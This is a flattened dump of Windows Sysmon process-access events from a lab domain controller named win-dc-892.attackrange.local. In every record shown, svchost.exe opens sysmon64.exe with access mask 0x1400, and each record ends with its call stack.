12:01:01.690{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001834Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.690{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001833Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.690{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001832Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.690{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001831Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.690{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001830Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.690{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001829Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.690{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001828Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.690{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001827Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.690{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001826Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.690{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001825Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.690{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001824Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.690{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001823Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.690{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001822Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.674{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001821Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.674{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001820Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.643{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001819Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.643{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001818Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.643{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001817Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.643{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001816Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.643{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001815Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.643{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001814Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.627{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001813Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.627{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001812Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:01.627{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000001811Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 